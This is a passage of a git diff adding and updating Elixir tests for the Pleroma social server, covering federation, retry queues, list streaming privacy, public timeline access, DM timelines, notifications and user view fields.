 |> Keyword.put(:federating, true) + +    Application.put_env(:pleroma, :instance, instance) +  end + +  test "does nothing when federating is enabled" do +    conn = +      build_conn() +      |> Pleroma.Web.FederatingPlug.call(%{}) + +    refute conn.status +    refute conn.halted +  end +end diff --git a/test/web/retry_queue_test.exs b/test/web/retry_queue_test.exs new file mode 100644 index 000000000..ce2964993 --- /dev/null +++ b/test/web/retry_queue_test.exs @@ -0,0 +1,31 @@ +defmodule MockActivityPub do +  def publish_one(ret) do +    {ret, "success"} +  end +end + +defmodule Pleroma.ActivityTest do +  use Pleroma.DataCase +  alias Pleroma.Web.Federator.RetryQueue + +  @small_retry_count 0 +  @hopeless_retry_count 10 + +  test "failed posts are retried" do +    {:retry, _timeout} = RetryQueue.get_retry_params(@small_retry_count) + +    assert {:noreply, %{delivered: 1}} == +             RetryQueue.handle_info({:send, :ok, MockActivityPub, @small_retry_count}, %{ +               delivered: 0 +             }) +  end + +  test "posts that have been tried too many times are dropped" do +    {:drop, _timeout} = RetryQueue.get_retry_params(@hopeless_retry_count) + +    assert {:noreply, %{dropped: 1}} == +             RetryQueue.handle_cast({:maybe_enqueue, %{}, nil, @hopeless_retry_count}, %{ +               dropped: 0 +             }) +  end +end diff --git a/test/web/streamer_test.exs b/test/web/streamer_test.exs index 47d491d1b..df58441f0 100644 --- a/test/web/streamer_test.exs +++ b/test/web/streamer_test.exs @@ -2,7 +2,7 @@ defmodule Pleroma.Web.StreamerTest do    use Pleroma.DataCase    alias Pleroma.Web.Streamer -  alias Pleroma.User +  alias Pleroma.{List, User}    alias Pleroma.Web.CommonAPI    import Pleroma.Factory @@ -60,4 +60,111 @@ defmodule Pleroma.Web.StreamerTest do      Task.await(task)    end + +  test "it doesn't send unwanted DMs to list" do +    user_a = insert(:user) +    user_b = insert(:user) +    user_c = insert(:user) + +    {:ok, user_a} = User.follow(user_a, user_b) + +    {:ok, list} = List.create("Test", user_a) +    {:ok, list} = List.follow(list, user_b) + +    task = +      Task.async(fn -> +        refute_receive {:text, _}, 1_000 +      end) + +    fake_socket = %{ +      transport_pid: task.pid, +      assigns: %{ +        user: user_a +      } +    } + +    {:ok, activity} = +      CommonAPI.post(user_b, %{ +        "status" => "@#{user_c.nickname} Test", +        "visibility" => "direct" +      }) + +    topics = %{ +      "list:#{list.id}" => [fake_socket] +    } + +    Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + +    Task.await(task) +  end + +  test "it doesn't send unwanted private posts to list" do +    user_a = insert(:user) +    user_b = insert(:user) + +    {:ok, list} = List.create("Test", user_a) +    {:ok, list} = List.follow(list, user_b) + +    task = +      Task.async(fn -> +        refute_receive {:text, _}, 1_000 +      end) + +    fake_socket = %{ +      transport_pid: task.pid, +      assigns: %{ +        user: user_a +      } +    } + +    {:ok, activity} = +      CommonAPI.post(user_b, %{ +        "status" => "Test", +        "visibility" => "private" +      }) + +    topics = %{ +      "list:#{list.id}" => [fake_socket] +    } + +    Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + +    Task.await(task) +  end + +  test "it send wanted private posts to list" do +    user_a = insert(:user) +    user_b = insert(:user) + +    {:ok, user_a} = User.follow(user_a, user_b) + +    {:ok, list} = List.create("Test", user_a) +    {:ok, list} = List.follow(list, user_b) + +    task = +      Task.async(fn -> +        assert_receive {:text, _}, 1_000 +      end) + +    fake_socket = %{ +      transport_pid: task.pid, +      assigns: %{ +        user: user_a +      } +    } + +    {:ok, activity} = +      CommonAPI.post(user_b, %{ +        "status" => "Test", +        "visibility" => "private" +      }) + +    topics = %{ +      "list:#{list.id}" => [fake_socket] +    } + +    Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + +    Task.await(task) +  end  end diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..291fd5237 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs +++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do      }      expected_html = -      "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{ +      "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{          mentioned_user.ap_id        }\">@shp</a>" @@ -139,6 +139,10 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do        "is_post_verb" => true,        "created_at" => "Tue May 24 13:26:08 +0000 2016",        "in_reply_to_status_id" => 213_123, +      "in_reply_to_screen_name" => nil, +      "in_reply_to_user_id" => nil, +      "in_reply_to_profileurl" => nil, +      "in_reply_to_ostatus_uri" => nil,        "statusnet_conversation_id" => convo_object.id,        "attachments" => [          ObjectRepresenter.to_map(object) diff --git a/test/web/twitter_api/representers/object_representer_test.exs b/test/web/twitter_api/representers/object_representer_test.exs index ebac051dc..228b2ac42 100644 --- a/test/web/twitter_api/representers/object_representer_test.exs +++ b/test/web/twitter_api/representers/object_representer_test.exs @@ -23,7 +23,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do        id: 6,        url: "someurl",        mimetype: "sometype", -      oembed: false +      oembed: false, +      description: nil      }      assert expected_object == ObjectRepresenter.to_map(object) @@ -46,7 +47,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do          "http://mastodon.example.org/system/media_attachments/files/000/000/001/original/8619f31c6edec470.png",        mimetype: "image/png",        oembed: false, -      id: nil +      id: nil, +      description: "blabla"      }      assert expected_object == ObjectRepresenter.to_map(object) diff --git a/test/web/twitter_api/twitter_api_controller_test.exs b/test/web/twitter_api/twitter_api_controller_test.exs index 3a035e298..6bdcb4fd8 100644 --- a/test/web/twitter_api/twitter_api_controller_test.exs +++ b/test/web/twitter_api/twitter_api_controller_test.exs @@ -77,7 +77,8 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do        conn = conn_with_creds |> post(request_path, %{status: " "})        assert json_response(conn, 400) == error_response -      conn = conn_with_creds |> post(request_path, %{status: "Nice meme."}) +      # we post with visibility private in order to avoid triggering relay +      conn = conn_with_creds |> post(request_path, %{status: "Nice meme.", visibility: "private"})        assert json_response(conn, 200) ==                 ActivityRepresenter.to_map(Repo.one(Activity), %{user: user}) @@ -99,6 +100,56 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do        assert length(response) == 10      end + +    test "returns 403 to unauthenticated request when the instance is not public" do +      instance = +        Application.get_env(:pleroma, :instance) +        |> Keyword.put(:public, false) + +      Application.put_env(:pleroma, :instance, instance) + +      conn +      |> get("/api/statuses/public_timeline.json") +      |> json_response(403) + +      instance = +        Application.get_env(:pleroma, :instance) +        |> Keyword.put(:public, true) + +      Application.put_env(:pleroma, :instance, instance) +    end + +    test "returns 200 to unauthenticated request when the instance is public" do +      conn +      |> get("/api/statuses/public_timeline.json") +      |> json_response(200) +    end +  end + +  describe "GET /statuses/public_and_external_timeline.json" do +    test "returns 403 to unauthenticated request when the instance is not public" do +      instance = +        Application.get_env(:pleroma, :instance) +        |> Keyword.put(:public, false) + +      Application.put_env(:pleroma, :instance, instance) + +      conn +      |> get("/api/statuses/public_and_external_timeline.json") +      |> json_response(403) + +      instance = +        Application.get_env(:pleroma, :instance) +        |> Keyword.put(:public, true) + +      Application.put_env(:pleroma, :instance, instance) +    end + +    test "returns 200 to unauthenticated request when the instance is public" do +      conn +      |> get("/api/statuses/public_and_external_timeline.json") +      |> json_response(200) +    end    end    describe "GET /statuses/show/:id.json" do @@ -220,6 +271,43 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do      end    end +  describe "GET /statuses/dm_timeline.json" do +    test "it show direct messages", %{conn: conn} do +      user_one = insert(:user) +      user_two = insert(:user) + +      {:ok, user_two} = User.follow(user_two, user_one) + +      {:ok, direct} = +        CommonAPI.post(user_one, %{ +          "status" => "Hi @#{user_two.nickname}!", +          "visibility" => "direct" +        }) + +      {:ok, direct_two} = +        CommonAPI.post(user_two, %{ +          "status" => "Hi @#{user_one.nickname}!", +          "visibility" => "direct" +        }) + +      {:ok, _follower_only} = +        CommonAPI.post(user_one, %{ +          "status" => "Hi @#{user_two.nickname}!", +          "visibility" => "private" +        }) + +      # Only direct should be visible here +      res_conn = +        conn +        |> assign(:user, user_two) +        |> get("/api/statuses/dm_timeline.json") + +      [status, status_two] = json_response(res_conn, 200) +      assert status["id"] == direct_two.id +      assert status_two["id"] == direct.id +    end +  end +    describe "GET /statuses/mentions.json" do      setup [:valid_user] @@ -280,6 +368,56 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do      end    end +  describe "POST /api/qvitter/statuses/notifications/read" do +    setup [:valid_user] + +    test "without valid credentials", %{conn: conn} do +      conn = post(conn, "/api/qvitter/statuses/notifications/read", %{"latest_id" => 1_234_567}) +      assert json_response(conn, 403) == %{"error" => "Invalid credentials."} +    end + +    test "with credentials, without any params", %{conn: conn, user: current_user} do +      conn = +        conn +        |> with_credentials(current_user.nickname, "test") +        |> post("/api/qvitter/statuses/notifications/read") + +      assert json_response(conn, 400) == %{ +               "error" => "You need to specify latest_id", +               "request" => "/api/qvitter/statuses/notifications/read" +             } +    end + +    test "with credentials, with params", %{conn: conn, user: current_user} do +      other_user = insert(:user) + +      {:ok, _activity} = +        ActivityBuilder.insert(%{"to" => [current_user.ap_id]}, %{user: other_user}) + +      response_conn = +        conn +        |> with_credentials(current_user.nickname, "test") +        |> get("/api/qvitter/statuses/notifications.json") + +      [notification] = response = json_response(response_conn, 200) + +      assert length(response) == 1 + +      assert notification["is_seen"] == 0 + +      response_conn = +        conn +        |> with_credentials(current_user.nickname, "test") +        |> post("/api/qvitter/statuses/notifications/read", %{"latest_id" => notification["id"]}) + +      [notification] = response = json_response(response_conn, 200) + +      assert length(response) == 1 + +      assert notification["is_seen"] == 1 +    end +  end +    describe "GET /statuses/user_timeline.json" do      setup [:valid_user] @@ -1080,4 +1218,20 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do        assert relationship["follows_you"] == false      end    end + +  describe "GET /api/pleroma/search_user" do +    test "it returns users, ordered by similarity", %{conn: conn} do +      user = insert(:user, %{name: "eal"}) +      user_two = insert(:user, %{name: "ean"}) +      user_three = insert(:user, %{name: "ebn"}) + +      resp = +        conn +        |> get(twitter_api_search__path(conn, :search_user), query: "eal") +        |> json_response(200) + +      assert length(resp) == 3 +      assert [user.id, user_two.id, user_three.id] == Enum.map(resp, fn %{"id" => id} -> id end) +    end +  end  end diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs index 6486540f8..8b9920bd9 100644 --- a/test/web/twitter_api/twitter_api_test.exs +++ b/test/web/twitter_api/twitter_api_test.exs @@ -48,7 +48,7 @@ defmodule Pleroma.Web.TwitterAPI.TwitterAPITest do               "https://www.w3.org/ns/activitystreams#Public"             ) -    assert Enum.member?(get_in(activity.data, ["cc"]), "shp") +    assert Enum.member?(get_in(activity.data, ["to"]), "shp")      assert activity.local == true      assert %{"moominmamma" => "http://localhost:4001/finmoji/128px/moominmamma-128.png"} = diff --git a/test/web/twitter_api/views/activity_view_test.exs b/test/web/twitter_api/views/activity_view_test.exs index a101e4ae8..5cef06f88 100644 --- a/test/web/twitter_api/views/activity_view_test.exs +++ b/test/web/twitter_api/views/activity_view_test.exs @@ -36,6 +36,10 @@ defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do        "favorited" => false,        "id" => activity.id,        "in_reply_to_status_id" => nil, +      "in_reply_to_screen_name" => nil, +      "in_reply_to_user_id" => nil, +      "in_reply_to_profileurl" => nil, +      "in_reply_to_ostatus_uri" => nil,        "is_local" => true,        "is_post_verb" => true,        "possibly_sensitive" => false, @@ -126,6 +130,33 @@ defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do      assert result == expected    end +  test "a like activity for deleted post" do +    user = insert(:user) +    other_user = insert(:user, %{nickname: "shp"}) + +    {:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"}) +    {:ok, like, _object} = CommonAPI.favorite(activity.id, other_user) +    CommonAPI.delete(activity.id, user) + +    result = ActivityView.render("activity.json", activity: like) + +    expected = %{ +      "activity_type" => "like", +      "created_at" => like.data["published"] |> Utils.date_to_asctime(), +      "external_url" => like.data["id"], +      "id" => like.id, +      "in_reply_to_status_id" => nil, +      "is_local" => true, +      "is_post_verb" => false, +      "statusnet_html" => "shp favorited a status.", +      "text" => "shp favorited a status.", +      "uri" => "tag:#{like.data["id"]}:objectType=Favourite", +      "user" => UserView.render("show.json", user: other_user) +    } + +    assert result == expected +  end +    test "an announce activity" do      user = insert(:user)      other_user = insert(:user, %{nickname: "shp"}) diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index 24a5c5bca..2c583c0d3 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -13,6 +13,13 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do      [user: user]    end +  test "A user with only a nickname", %{user: user} do +    user = %{user | name: nil, nickname: "scarlett@catgirl.science"} +    represented = UserView.render("show.json", %{user: user}) +    assert represented["name"] == user.nickname +    assert represented["name_html"] == user.nickname +  end +    test "A user with an avatar object", %{user: user} do      image = "image"      user = %{user | avatar: %{"url" => [%{"href" => image}]}} @@ -22,7 +29,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do    test "A user with emoji in username", %{user: user} do      expected = -      "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man" +      "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"      user = %{        user @@ -87,7 +94,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do        "background_image" => nil,        "is_local" => true,        "locked" => false, -      "default_scope" => "public" +      "default_scope" => "public", +      "no_rich_text" => false, +      "fields" => []      }      assert represented == UserView.render("show.json", %{user: user}) @@ -126,7 +135,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do        "background_image" => nil,        "is_local" => true,        "locked" => false, -      "default_scope" => "public" +      "default_scope" => "public", +      "no_rich_text" => false, +      "fields" => []      }      assert represented == UserView.render("show.json", %{user: user, for: follower}) @@ -166,7 +177,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do        "background_image" => nil,        "is_local" => true,        "locked" => false, -      "default_scope" => "public" +      "default_scope" => "public", +      "no_rich_text" => false, +      "fields" => []      }      assert represented == UserView.render("show.json", %{user: follower, for: user}) @@ -213,10 +226,38 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do        "background_image" => nil,        "is_local" => true,        "locked" => false, -      "default_scope" => "public" +      "default_scope" => "public", +      "no_rich_text" => false, +      "fields" => []      }      blocker = Repo.get(User, blocker.id)      assert represented == UserView.render("show.json", %{user: user, for: blocker})    end + +  test "a user with mastodon fields" do +    fields = [ +      %{ +        "name" => "Pronouns", +        "value" => "she/her" +      }, +      %{ +        "name" => "Website", +        "value" => "https://example.org/" +      } +    ] + +    user = +      insert(:user, %{ +        info: %{ +          "source_data" => %{ +            "attachment" => +              Enum.map(fields, fn field -> Map.put(field, "type", "PropertyValue") end) +          } +        } +      }) + +    userview = UserView.render("show.json", %{user: user}) +    assert userview["fields"] == fields +  end  end | 
